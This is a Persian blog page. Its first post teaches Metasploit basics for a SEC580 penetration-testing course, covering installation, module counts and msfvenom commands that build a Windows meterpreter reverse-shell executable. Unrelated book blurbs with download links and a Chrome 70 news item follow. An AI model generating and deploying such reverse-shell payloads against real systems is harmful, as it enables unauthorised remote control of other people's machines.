نوشته‌ها

آموزش SEC580 – بخش اول

سلام خدمت شما

امروز تصمیم گرفتم که دوره SEC580 رو به صورت متنی در وب سایت شخصی خودم منتشر کنم تا چراغ راهی باشه برای علاقه‌مندان به مباحث تست نفوذ از طریق متاسپلویت که بتوانند به صورت رایگان به این محتوای ارزشمند دسترسی داشته باشند.

با توجه به درگیری‌های کاری سعی می کنم هر هفته ۱ تا ۲ پارت از این آموزش را منتشر کنم.دوره به صورت فشرده و کوتاه خواهد بود.

آموزش SEC580 - بخش اول

دوره آموزشی SEC580 از دوره‌های موسسه SANS است که به آموزش ابزار قدرتمند متاسپلویت می پردازد.

ابتدا باید ببینیم متاسپلویت چیست؟

متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. نسخه سوم به‌طور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶).

شما با استفاده از این فریم ورك می‌توانید آسیب پذیری‌هاي موجود در سیستم‌ها، پروتکل‌ها و نرم افزارهاي مختلف را شناسایی کرده و آنها را مورد نفوذ و یا حمله قرار دهید.

این اپلیکیشن به صورت پیش فرض  دارای اکسپلویت‌هاي بسیاری می‌باشد ولی علاوه بر آن شما می‌توانید اکسپلویت مورد نظر خودتان را ایجاد و به آن اضافه کنید.

نصب فریم ورک متاسپلویت

این فریم ورک به صورت پیش فرض در سیستم عامل کالی لینوکس وجود دارد و شما می‌توانید به راحتی از آن استفاده کنید.

اما اگر مایل به نصب متاسپلویت بر روی توزیع دیگری از لینوکس هستید، مشکلی وجود ندارد.باید به این شکل عمل کنید.

sudo apt-get install gpgv2 autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev

پس از نصب وارد لینک زیر شوید و فایل metasploit.run را دانلود کنید

https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

به ترتیب دستورات را وارد کنید:

mkdir /opt/metasploit

mv metasploit.run /opt/metasploit

chmod +x metasploit.run

./metasploit.run

پس نصب دستور msfconsole را وارد کنید تا محیط متاسپلویت برای شما اجرا شود.

حال نیاز است که با بخش‌های مختلف این فریم ورک آشنا شویم.

متاسپلویت دارای ماژول های مختلفی و تقسیم بندی های مختلفی است که به شرح زیر می باشند تعداد ۱۸۸۶ اکسپلویت، تعداد ۱۰۶۵ Auxiliary ، تعداد ۳۲۸ ماژولPost ، تعداد ۵۴۶ Payload و تعداد ۴۴ encoder و ۱۰ Nops و ۲ evasion.

متااسپلویت چندین رابط کاربری دارد. در گذشته رابط های آن بیشتر بود برای مثال msfcli و msfencode که جای خود را به msfpayload دادند.

بریم سراغ تست ابزار:

 قصد دارم یک Payload برای سیستم عامل ویندوز با استفاده از msfpayload ایجاد کنم. این رابط کاربری متاسپلویت وظیفه msfcli و msfencode را انجام می دهد.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

با استفاده از سوییچ -p ، Payload مد نظر را تعیین میکنیم. به جای<Local Port>  یک Port را وارد کنید برای مثال ۴۴۴۴٫

 به جای Local IP Address درواقع IP سیستم خود را وارد کنید.

 با استفاده از سوییچ -f فرمت فایل و در آخر هم خروجی را در یک فایل exe با نام shell قرار دادیم .

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.40 LPORT=4444 -f exe > shell.exe

Mastering Modern Linux

Mastering Modern Linux

Praise for the First Edition:

“This outstanding book … gives the reader robust concepts and implementable knowledge of this environment. Graphical user interface (GUI)-based users and developers do not get short shrift, despite the command-line interface’s (CLI) full-power treatment. … Every programmer should read the introduction’s Unix/Linux philosophy section. … This authoritative and exceptionally well-constructed book has my highest recommendation. It will repay careful and recursive study.

–Computing Reviews, August 2011

Mastering Modern Linux, Second Edition retains much of the good material from the previous edition, with extensive updates and new topics added. The book provides a comprehensive and up-to-date guide to Linux concepts, usage, and programming. The text helps the reader master Linux with a well-selected set of topics, and encourages hands-on practice.

The first part of the textbook covers interactive use of Linux via the Graphical User Interface (GUI) and the Command-Line Interface (CLI), including comprehensive treatmentof the Gnome desktop and the Bash Shell. Using different apps, commands and filters, building pipelines, and matching patterns with regular expressions are major focuses.

Next comes Bash scripting, file system structure, organization, and usage. The following chapters present networking, the Internet and the Web, data encryption, basic system admin, as well as Web hosting. The Linux Apache MySQL/MariaDB PHP (LAMP) Web hosting combination is also presented in depth.

In the last part of the book, attention is turned to C-level programming. Topics covered include the

C compiler, preprocessor, debugger, I/O, file manipulation, process control, inter-process communication, and networking.

The book includes many examples and complete programs ready to download and run. A summary and exercises of varying degrees of difficulty can be found at the end of each chapter. A companion website (http://mml.sofpower.com) provides appendices, information updates, an example code package, and other resources for instructors, as well as students.

 

دانلود رایگان کتاب

Learning Docker Networking

Learning Docker Networking

Book Description

Docker is a Linux container implementation that enables the creation of light weight portable development and production environments. These environments can be updated incrementally. Docker achieves this by leveraging containment principles like cgroups and Linux namespaces along with Overlay filesystem based portable images. Docker provides the networking primitives that allow administrators to specify how different containers network with each application and connect each of its components, then distribute them across a large number of servers and ensure coordination between them irrespective of the host or VM they are running in.

This book will show you how to create, deploy, and manage a virtual network for connecting containers spanning single or multiple hosts.

What you will learn

Get to know the basics of networking and see how Docker networking works

Expose the strengths and weaknesses of the current Docker network implementation and third party landscape

Understand Docker networking spanning multiple containers over multiple hosts through practical examples

Observe the pitfalls of Docker networking and how to overcome them

Learn how Docker networking works for Docker Swarm and Kubernetes

Configure Networking using Docker’s container network model (CNM)

Explore OpenvSwitch to connect contain

 

دانلود رایگان کتاب

 

Linux Firewalls: Enhancing Security with nftables and Beyond

Linux Firewalls: Enhancing Security with nftables and Beyond

As the security challenges facing Linux system and network administrators have grown, the security tools and techniques available to them have improved dramatically. In Linux® Firewalls, Fourth Edition, long-time Linux security expert Steve Suehring has revamped his definitive Linux firewall guide to cover the important advances in Linux security.

An indispensable working resource for every Linux administrator concerned with security, this guide presents comprehensive coverage of both iptables and nftables. Building on the solid networking and firewalling foundation in previous editions, it also adds coverage of modern tools and techniques for detecting exploits and intrusions, and much more.

Distribution neutral throughout, this edition is fully updated for today’s Linux kernels, and includes current code examples and support scripts for Red Hat/Fedora, Ubuntu, and Debian implementations. If you’re a Linux professional, it will help you establish an understanding of security for any Linux system, and for networks of all sizes, from home to enterprise.

Inside, you’ll find just what you need to

Install, configure, and update a Linux firewall running either iptables or nftables

Migrate to nftables, or take advantage of the latest iptables enhancements

Manage complex multiple firewall configurations

Create, debug, and optimize firewall rules

Use Samhain and other tools to protect filesystem integrity, monitor networks, and detect intrusions

Harden systems against port scanning and other attacks

Uncover exploits such as rootkits and backdoors with chkrootkit

 

دانلود رایگان کتاب

گوگل کروم ۷۰ منتشر شد؛ با تغییرات جدید آشنا شوید

گوگل کروم ۷۰ منتشر شد؛ با تغییرات جدید آشنا شوید

گوگل ساعاتی پیش نسخه ۷۰ مرورگر محبوب خود را در دسترس کاربران ویندوز، مک و لینوکس قرار داد.

در نسخه جدید قابلیتی فراهم شده تا کاربران بتوانند اتصال بین اکانت گوگل و کروم را غیر فعال کنند، حالا مرورگر از اپلیکیشن های تحت وب پشتیبانی می‌کند، امنیت افزایش یافته و همچنین شاهد پشتیبانی از فرمت ویدیویی جدید A1 هستیم.

بزرگترین تغییر کروم ۷۰ یک عقب‌گرد به نسخه‌های قبلی است. در کروم ۶۹ گوگل سعی کرد تا ورود به سایت گوگل را آسان‌تر کند و برای این منظور، آن‌ها کاری کردند تا بتوان با همان اکانت گوگل‌ به کروم هم وصل شد.

اما دو مشکل به وجود آمد، اول اینکه اگر از یکی از اکانت‌ها (گوگل یا کروم) بیرون می‌آمدید، هر دو اکانت ساین اوت می‌شدند.

مسئله دوم هم به حریم شخصی برمی‌گشت. اگر مرورگر به اکانت گوگل متصل می‌شد و همگام‌سازی اطلاعات (که گوگل کاربران را تشویق به آن می‌کند) را نیز فعال می‌کردید تاریخچه مرورگر، بوکمارک‌ها و رمزها در سرور گوگل ذخیره می‌شدند.

چیزی که نگرانی کاربران را در پی داشت. حالا در نسخه جدید قابلیتی فراهم شده تا این عضویت اتوماتیک را غیر فعال بکنید و بنابراین دیگر از مشکلات بالا خبری نباشد.

اما در کنا این تغییر، اجرای «اپلیکیشن های تحت وب» (Progressive Web Apps یا به اختصار PWA) دومین قابلیت مهم کروم ۷۰ هستند. PWA ها در واقع مشابه اپ های معمولی ویندوز هستند، با این تفاوت که تحت وب بوده و به همین خاطر ضمن داشتن حجم کم، نیازی به نصب شان نیست.

گوگل کروم ۷۰ منتشر شد؛ با تغییرات جدید آشنا شوید

گوگل چند هفته پیش قول داده بود تا با کنترل بیشتر افزونه‌های کروم، دست هکرها برای دزدی اطلاعات را کوتاه می‌کند. در کروم ۷۰ یکی از این قول‌ها عملی شده است؛ اکنون می‌توانید مشخص کنید تا افزونه‌ها در چه سایت‌هایی فعالیت داشته‌ باشند و کجا غیر فعال باقی بمانند.

بد نیست بدانید فعلا خبری از کروم ۷۰ روی اندروید نشده اما کاربران iOS هم هم‌اکنون می‌توانند برنامه را دریافت کنند.

هر چند آپدیت نسخه iOS ویژگی بزرگی ندارد و به غیر از رفع باگ‌ها، افزایش امنیت و ثبات تغییر مهمی را شاهد نیستیم. اگر رایانه شخصی دارید، کروم ۷۰ را می‌توانید از خود اپ یا سایت گوگل دریافت کنید.

CompTIA Linux+ Complete Study Guide Exams LX0-101 and LX0-102

دو مرجع برجسته ی صدور گواهینامه ی لینوکس، CompTIA و LPI به یکدیگر پیوستند و دو آزمون Linux+، LX0-101 و LX0-102 را منتشر ساختند.

در این راهنمای مطالعه ی Sybex هر چیزی که برای آماده شدن در این دو آزمون مورد نیاز است تجزیه و تحلیل می شود. تمام اهداف آزمون در این کتاب پوشش داده شده از جمله ابزارهای خط فرمان لینوکس، مدیریت نرم افزار، پیکربندی سخت افزار، مدیریت فایل ها و سیستم فایل و بسیاری از موارد دیگر.

سرفصل ها:

Part I The CompTIA Linux+ LX0-101 Exam

Chapter1: Exploring Linux Command-Line Tools

Chapter2: Managing Software

Chapter3: Configuring Hardware

Chapter4: Managing Files

Chapter5: Booting Linux and Editing Files

Part II The CompTIA Linux+ LX0-102 Exam

Chapter6: Configuring the X Window System, Localization, and Printing

Chapter7: Administering the System

Chapter8: Configuring Basic Networking

Chapter9: Writing Scripts, Configuring E-Mail, and Using Databases

Chapter10: Securing Your System

مشخصات:

نویسنده: Roderick W. Smith

ناشر: Sybex

سال نشر: ۲۰۱۰

تعداد صفحات: ۶۵۰

دانلود رایگان کتاب